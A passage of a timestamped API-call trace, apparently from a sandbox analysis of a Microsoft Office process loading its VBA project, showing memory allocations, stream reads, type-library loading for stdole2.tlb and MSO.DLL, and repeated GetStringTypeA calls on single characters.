lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x624a62c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0058.726] CRetailMalloc_Alloc () returned 0x87fc290 [0058.726] CRetailMalloc_Free () returned 0x3720501 [0058.727] CRetailMalloc_Alloc () returned 0x8811000 [0058.727] CRetailMalloc_Free () returned 0x6050301 [0058.727] CRetailMalloc_Alloc () returned 0x86800a8 [0058.727] CRetailMalloc_Free () returned 0x1610001 [0058.727] CRetailMalloc_Realloc () returned 0x8853600 [0058.727] CRetailMalloc_Alloc () returned 0x86800a8 [0058.728] CRetailMalloc_Free () returned 0x1610001 [0058.728] CRetailMalloc_Alloc () returned 0x876c658 [0058.728] CRetailMalloc_Free () returned 0xec0001 [0058.728] CRetailMalloc_Alloc () returned 0x86e5f98 [0058.729] CRetailMalloc_Alloc () returned 0x86e5fc8 [0058.729] CRetailMalloc_Alloc () returned 0x86e5fd8 [0058.729] CRetailMalloc_Free () returned 0x39a0201 [0058.729] CRetailMalloc_Alloc () returned 0x8750220 [0058.729] CRetailMalloc_Alloc () returned 0x87fc290 [0058.729] CRetailMalloc_Free () returned 0x3980201 [0058.730] CRetailMalloc_Free () returned 0x3960201 [0058.732] CRetailMalloc_Alloc () returned 0x8853b28 [0058.757] CRetailMalloc_Realloc () returned 0x86e5f98 [0058.758] CRetailMalloc_Realloc () returned 0x8853f48 [0058.758] CExposedDocFile::OpenStream () returned 0x0 [0058.758] CExposedStream::Read () returned 0x0 [0058.758] CRetailMalloc_Alloc () returned 0x8854168 [0058.759] CRetailMalloc_Alloc () returned 0x8856188 [0058.760] CExposedStream::AddRef () returned 0x2 [0058.761] CExposedStream::Release () returned 0x1 [0058.761] CExposedStream::Read () returned 0x0 [0058.761] CExposedStream::Read () returned 0x0 [0058.785] CompareStringA (Locale=0x409, dwCmpFlags=0x3, lpString1="Test", cchCount1=-1, lpString2="Test", cchCount2=-1) returned 2 [0058.785] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x347e54, cbMultiByte=2, lpWideCharStr=0x347e58, cchWideChar=2 | out: lpWideCharStr="") returned 2 [0058.786] CRetailMalloc_Alloc () returned 0x8750100 [0058.786] CRetailMalloc_Free () returned 0x3590501 [0058.786] CRetailMalloc_Alloc () returned 0x8811000 [0058.786] CRetailMalloc_Realloc () returned 0x880dc00 [0058.786] CRetailMalloc_Free () returned 0xc3a0401 [0058.790] CLSIDFromString (in: lpsz="{00020430-0000-0000-C000-000000000046}", pclsid=0x347d70 | out: pclsid=0x347d70*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0058.792] wcsncpy_s (in: _Destination=0x87f1944, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x30 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#") returned 0x0 [0058.792] wcscpy_s (in: _Destination=0x87f19a4, _SizeInWords=0x2f, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0058.793] wcscpy_s (in: _Destination=0x87f19e2, _SizeInWords=0x10, _Source="#OLE Automation" | out: _Destination="#OLE Automation") returned 0x0 [0058.793] CRetailMalloc_Realloc () returned 0x885e1a0 [0058.793] CRetailMalloc_Alloc () returned 0x87cc298 [0058.793] CRetailMalloc_Free () returned 0x1790001 [0058.793] CRetailMalloc_Alloc () returned 0x87cc298 [0058.793] CRetailMalloc_Free () returned 0x1790001 [0058.794] CRetailMalloc_Alloc () returned 0x876c658 [0058.794] CRetailMalloc_Free () returned 0xec0001 [0058.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x347d3c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0058.795] CRetailMalloc_Alloc () returned 0x87ce438 [0058.795] wcscpy_s (in: _Destination=0x87f1944, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0058.811] LoadTypeLib (in: szFile="C:\\Windows\\SysWOW64\\stdole2.tlb", pptlib=0x347ae8*=0x0 | out: pptlib=0x347ae8*=0x87ceab0) returned 0x0 [0058.812] wcscpy_s (in: _Destination=0x87ce438, _SizeInWords=0x104, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0058.812] CRetailMalloc_Free () returned 0x33e0001 [0058.812] IUnknown:AddRef (This=0x87ceab0) returned 0x4 [0058.812] IUnknown:QueryInterface (in: This=0x87ceab0, riid=0x7503d870*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x347afc | out: ppvObject=0x347afc*=0x0) returned 0x80004002 [0058.812] CRetailMalloc_Alloc () returned 0x86bace0 [0058.813] CRetailMalloc_Free () returned 0xa20001 [0058.813] CRetailMalloc_Alloc () returned 0x8811140 [0058.813] CRetailMalloc_Realloc () returned 0x8841f68 [0058.813] CRetailMalloc_Free () returned 0x6920001 [0058.833] CRetailMalloc_Alloc () returned 0x876c658 [0058.833] CRetailMalloc_Free () returned 0xec0001 [0058.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x347d3c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0058.834] CRetailMalloc_Alloc () returned 0x8804548 [0058.834] CRetailMalloc_Free () returned 0x16d0101 [0058.834] CRetailMalloc_Alloc () returned 0x8811000 [0058.834] CRetailMalloc_Realloc () returned 0x8769778 [0058.834] CRetailMalloc_Free () returned 0x6990101 [0058.835] CRetailMalloc_Alloc () returned 0x883de10 [0058.835] CRetailMalloc_Free () returned 0xf20001 [0058.836] CLSIDFromString (in: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", pclsid=0x347d70 | out: pclsid=0x347d70*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52))) returned 0x0 [0058.836] CRetailMalloc_Alloc () returned 0x87eb748 [0058.837] CRetailMalloc_Free () returned 0x1120001 [0058.837] wcsncpy_s (in: _Destination=0x74ce734, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x30 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#") returned 0x0 [0058.837] wcscpy_s (in: _Destination=0x74ce794, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0058.837] wcscpy_s (in: _Destination=0x74ce812, _SizeInWords=0x26, _Source="#Microsoft Office 16.0 Object Library" | out: _Destination="#Microsoft Office 16.0 Object Library") returned 0x0 [0058.838] CRetailMalloc_Alloc () returned 0x8680a68 [0058.838] CRetailMalloc_Free () returned 0x1880001 [0058.838] CRetailMalloc_Realloc () returned 0x885e848 [0058.838] CRetailMalloc_Alloc () returned 0x8680a68 [0058.838] CRetailMalloc_Free () returned 0x1880001 [0058.839] CRetailMalloc_Alloc () returned 0x876c658 [0058.839] CRetailMalloc_Free () returned 0xec0001 [0058.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x347d3c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0058.840] CRetailMalloc_Alloc () returned 0x87ce438 [0058.840] wcscpy_s (in: _Destination=0x74ce734, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0058.848] LoadTypeLib (in: szFile="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x347ae8*=0x0 | out: pptlib=0x347ae8*=0x87cef00) returned 0x0 [0058.919] wcscpy_s (in: _Destination=0x87ce438, _SizeInWords=0x104, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0058.921] CRetailMalloc_Free () returned 0x33e0001 [0058.921] IUnknown:AddRef (This=0x87cef00) returned 0x2 [0058.923] IUnknown:QueryInterface (in: This=0x87cef00, riid=0x7503d870*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x347afc | out: ppvObject=0x347afc*=0x0) returned 0x80004002 [0058.935] CRetailMalloc_Alloc () returned 0x86eff58 [0058.935] CRetailMalloc_Free () returned 0x23e0001 [0058.935] CRetailMalloc_Alloc () returned 0x8811348 [0058.936] CRetailMalloc_Realloc () returned 0x867bc18 [0058.936] CRetailMalloc_Free () returned 0xd280001 [0058.940] CRetailMalloc_Realloc () returned 0x86e5fc8 [0058.940] CRetailMalloc_Alloc () returned 0x8842070 [0058.940] CRetailMalloc_Alloc () returned 0x7809558 [0058.940] CRetailMalloc_Alloc () returned 0x867bb38 [0058.942] CRetailMalloc_Alloc () returned 0x876c658 [0058.942] CRetailMalloc_Alloc () returned 0x86bace0 [0058.942] CRetailMalloc_Realloc () returned 0x8841f68 [0058.942] CRetailMalloc_Realloc () returned 0x8750100 [0058.942] CRetailMalloc_Realloc () returned 0x86e5fa8 [0058.942] CRetailMalloc_Alloc () returned 0x880dc00 [0058.943] CRetailMalloc_Free () returned 0x8e0001 [0058.943] CRetailMalloc_Alloc () returned 0x8811348 [0058.943] CRetailMalloc_Realloc () returned 0x87f3788 [0058.943] CRetailMalloc_Free () returned 0xa20001 [0058.943] CRetailMalloc_Alloc () returned 0x884fe38 [0058.943] CRetailMalloc_Alloc () returned 0x8811348 [0058.943] CRetailMalloc_Alloc () returned 0x87fc248 [0058.943] CRetailMalloc_Alloc () returned 0x87eb748 [0058.943] CRetailMalloc_Alloc () returned 0x86e5f88 [0058.945] CRetailMalloc_Alloc () returned 0x86e5fb8 [0058.945] CRetailMalloc_Alloc () returned 0x8871168 [0058.945] CRetailMalloc_Alloc () returned 0x87eb7d0 [0058.945] CRetailMalloc_Alloc () returned 0x8853600 [0058.945] CRetailMalloc_Alloc () returned 0x88113c0 [0058.945] CRetailMalloc_Alloc () returned 0x86e5f98 [0058.945] CRetailMalloc_Alloc () returned 0x86e6008 [0058.945] CRetailMalloc_Alloc () returned 0x8811398 [0058.947] CRetailMalloc_Alloc () returned 0x87eb8e0 [0058.947] CRetailMalloc_Alloc () returned 0x620ee50 [0058.947] CRetailMalloc_Alloc () returned 0x620fe70 [0058.947] CRetailMalloc_Alloc () returned 0x6210278 [0058.948] CRetailMalloc_Alloc () returned 0x876cb38 [0058.948] CRetailMalloc_Free () returned 0x1c0001 [0058.948] CExposedDocFile::AddRef () returned 0x3 [0058.948] CExposedDocFile::OpenStream () returned 0x0 [0058.949] CExposedDocFile::Release () returned 0x3 [0058.949] CExposedStream::Seek () returned 0x0 [0058.949] CExposedStream::AddRef () returned 0x2 [0058.949] CExposedStream::Read () returned 0x0 [0058.949] CRetailMalloc_Alloc () returned 0x8871788 [0058.949] CRetailMalloc_Alloc () returned 0x88737a8 [0058.951] CExposedStream::AddRef () returned 0x3 [0058.951] CExposedStream::Release () returned 0x2 [0058.951] CRetailMalloc_Alloc () returned 0x887b7c0 [0058.952] CRetailMalloc_Alloc () returned 0x76fbea0 [0058.952] CExposedStream::Read () returned 0x0 [0058.953] CExposedStream::Read () returned 0x0 [0058.953] CRetailMalloc_Alloc () returned 0x887e6a8 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x80", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x81", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x82", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x83", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x84", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="…", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x86", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x87", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x88", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x89", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8a", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8b", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8c", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8d", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8e", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8f", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x90", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x91", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x92", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x93", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x94", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x95", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x96", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x97", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x98", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x99", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9a", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9b", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9c", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9d", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9e", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9f", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr=" ", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¡", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¢", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="£", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.961] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¤", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.961] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¥", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.961] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¦", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.961] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="§", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.962] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¨", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.962] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="©", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.963] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ª", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.963] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="«", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.963] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¬", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.963] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="­", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.963] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="®", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.963] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¯", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.963] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="°", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.963] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="±", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.963] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="²", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.964] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="³", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.964] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="´", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.964] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="µ", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.964] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¶", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.964] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="·", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.964] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¸", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.964] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¹", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.964] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="º", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.964] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="»", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.964] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¼", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.965] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="½", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.965] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¾", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.965] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¿", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.966] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="À", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.966] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Á", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.966] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Â", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.966] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ã", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.966] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ä", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.966] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Å", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.966] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Æ", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.966] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ç", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.966] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="È", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.967] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="É", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.967] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ê", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.967] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ë", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.967] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ì", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.967] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Í", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.967] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Î", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.967] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ï", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.967] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ð", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.967] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ñ", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.967] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ò", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.967] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ó", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.968] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ô", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.968] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Õ", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.968] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ö", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.968] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="×", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.968] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ø", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.968] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ù", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.968] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ú", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.968] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Û", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.968] 